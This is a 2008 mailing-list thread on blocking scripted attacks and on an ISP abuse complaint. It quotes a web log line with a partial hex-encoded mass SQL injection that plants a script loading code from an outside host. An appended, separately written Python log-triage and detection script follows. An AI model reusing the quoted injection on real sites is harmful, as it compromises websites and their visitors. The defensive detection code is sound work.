Infiltration of ISP providers by crackers.

George Magklaras georgios at biotek.uio.no
Wed Aug 27 11:52:34 UTC 2008


I do not normally bother following up on reports on all attacks. Most of 
them are scripted and there are too many. So, my IPS/IDS has a good list 
of 'not-to-block' IP addresses and whatever else outside this IP list 
attacks any service is blocked. Most good IPS/IDS vendors also provide 
near real-time lists of network blocks, especially from countries with 
large ISP segments that typically consist of various classes of IP 
blocks for home DSL/dialup customers, where most of the compromised PCs 
serve botnets and malicious scripters. This keeps the number of IPTABLES 
rules down and can block most of these annoying attacks.

GEO-IP blocking may also help if you definitely know that you should not 
be expecting traffic from any part of the world. The problem is that you need to 
update the IP list regularly and be ready to accept some false positives 
from IPs that suddenly become legit.

For other types of more persistent and unusual attacks, you need to get 
in touch with the CERT team of a major telco provider. They are keen to 
know of these issues and, if they provide the backbone of your 
connectivity, maybe there is a part of your SLA that covers these sorts of 
things, generally speaking.


GM

-- 
--
George Magklaras

Senior Computer Systems Engineer/UNIX Systems Administrator
EMBnet Technical Management Board
The Biotechnology Centre of Oslo,
University of Oslo
http://folk.uio.no/georgios



Jose R R wrote:
> So ...(sigh) what do you do when you complain to a given ISP provider about
> a case of attempted abuse by one of their IP addresses and you get a
> response from someone in the "security team" whose email name is "cracker?"
> 
> Apparently some (or many) of these crackers own (with their consent or not)
> even their ISP providers --or worse, some (or many) ISP providers may be
> crackers themselves!
> 
> A portion of my original complaint to the ISP --where I list one of the
> attempted abuse records by the cracker for informational purposes:
> 
> ----------------------------------------------------------------------------------
> From: myself <my_email_address>
> To: network-adm at hinet.net, network-center at hinet.net
> Date: Mon, Aug 25, 2008 at 11:37 PM
> Subject: Abuse by user at IP address 118.167.20.180
> Mailed-by: my_domain
> 
> On August 25, 2008, from 08:52:10 am to 08:52:28 am (America/Tijuana time),
> user at IP address 118.167.20.180 abused <my> web site with the below
> referenced offending code (relevant web server log section is attached and
> named as abuse-118_167_20_180.txt).
> 
> 118.167.20.180 - - [25/Aug/2008:08:52:10 -0700] "GET
> /blog/index.php/2008/07/12/
> xenserver-4-1-and-32-bit-and-64-bit-virt?blog=4';DECLARE%20@S
> %20CHAR(4000);SET%20@S=CAST([...]
703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
> HTTP/1.1" 400 567 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1;
> Foxy/1; Foxy/1; .NET CLR 1.1.4322)"
> 
> [...]
> 
> I would appreciate your cooperation in stopping this sort of cracker
> engagement.
> 
> Thank you in advance for your prompt attention to this issue.
> 
> ---------------End of portion of email sent----------------------------------------------------------------------------
> 
> 
> 
> Below is an interesting section of one of the replies:
> 
> -------------------------------------------------------------------
> 
> Return-Path: <my_email_address>
> Received: from localhost (localhost [127.0.0.1])
>         by dns.adsl.hinet.net (8.12.3/8.12.3/Debian-6.6) with ESMTP id
> m7QA4XUN014545
>         for <cracker at localhost>; Tue, 26 Aug 2008 18:06:31 +0800
> [...]
> 
> ----------End of unformatted reply----------------------------------------------------------
> 
> 
> The above was attached to the formatted email reply below:
> 
> ----------------------------------------------------------------------
> 
> From: cracker at hinet.net
> To: <my_email_address>
> Date: Tue, Aug 26, 2008 at 4:24 AM
> Subject: [HiNetSOC/Craker : 1219749049]HiNet Notification(HiNet 通知)
> Mailed-by: lcss.hinet.net
> 
> 
> Dear Sir:
> 
>  Thank you for your email. Please kindly provide us with more detailed information
> about the bad behavior, at least including the attacker's IP address, time
> (GMT, Greenwich Mean Time) and evidence, for further processing.
> 
> Yours sincerely,
> 
> HiNet Security Operation Center
> Chunghwa Telecom Co., Ltd.
> Taipei, Taiwan, R.O.C.
> Email: cracker at hinet.net
> 
> Please refer to your original report email and attach the file(s) again.
> 
> ------End of formatted email reply-------------------------------------------------------------------
> 
> No wonder spam and intrusion attempts never end.
> 
> Jose R R
> http://www.metztli-it.com
> 
> IBM Lotus Symphony <http://symphony.lotus.com> is officially supported on RH
> and SuSE; official Ubuntu support coming at the end of August 2008.
> 
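As an added example (not code from either message in this thread), the following Python script triages an access-log line of the same shape as the one quoted above and applies the "not-to-block list wins" rule from the reply: it URL-decodes the request, matches the DECLARE/CAST/EXEC pattern, decodes the hex to readable text for the abuse report, and converts the -0700 log timestamp to UTC, the form the HiNet SOC asked for. The log line, the addresses (documentation ranges) and the network lists are constructed samples, and the hex payload is a placeholder string, not the one from the thread.

```python
import re
from datetime import datetime, timezone
from ipaddress import ip_address, ip_network
from urllib.parse import unquote

# Apache "combined" access log: client IP, identd, user, [timestamp], "request", status, ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')
# Shape of the injection quoted in the thread:
#   DECLARE @S CHAR(n); SET @S=CAST(0x<hex> AS CHAR(n)); EXEC(@S)
INJECT_RE = re.compile(
    r"DECLARE\s+@(\w+)\s+N?(?:VAR)?CHAR\(\d+\)\s*;\s*SET\s+@\1\s*=\s*"
    r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR\(\d+\)\)\s*;\s*EXEC\(@\1\)",
    re.IGNORECASE,
)

def log_time_to_utc(ts):
    """'25/Aug/2008:08:52:10 -0700' -> '2008-08-25 15:52:10 UTC' (what the SOC asked for)."""
    return datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z").astimezone(timezone.utc) \
        .strftime("%Y-%m-%d %H:%M:%S UTC")

def triage(line):
    """Return None for lines without the injection pattern, else an abuse-report record."""
    m = LOG_RE.match(line)
    if not m:
        return None
    request = unquote(m.group("req"))      # %20 -> space, %27 -> ', %40 -> @ ...
    hit = INJECT_RE.search(request)
    if not hit:
        return None
    # CAST(0x.. AS CHAR) yields one byte per hex pair; latin-1 maps every byte to a character
    decoded = bytes.fromhex(hit.group(2)).decode("latin-1")
    return {"ip": m.group("ip"), "time_utc": log_time_to_utc(m.group("ts")),
            "status": int(m.group("status")), "decoded_payload": decoded}

def should_block(ip, never_block, block_ranges):
    """The 'not-to-block' list takes precedence over any block list (hypothetical lists)."""
    addr = ip_address(ip)
    if any(addr in ip_network(n) for n in never_block):
        return False
    return any(addr in ip_network(n) for n in block_ranges)

# Constructed sample line; the hex-encoded SQL is a harmless placeholder, not the thread's payload
SAMPLE_SQL = "SELECT 'constructed sample: <script src=\"http://example.invalid/w.js\"></script>'"
SAMPLE_LINE = ('192.0.2.10 - - [25/Aug/2008:08:52:10 -0700] "GET /blog/index.php?blog=4%27;'
               'DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x' + SAMPLE_SQL.encode().hex().upper()
               + '%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 400 567 "-" "Mozilla/4.0"')

if __name__ == "__main__":
    rec = triage(SAMPLE_LINE)
    print(rec)
    print("block:", should_block(rec["ip"], ["198.51.100.0/24"], ["192.0.2.0/24"]))
```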




More information about the redhat-list mailing list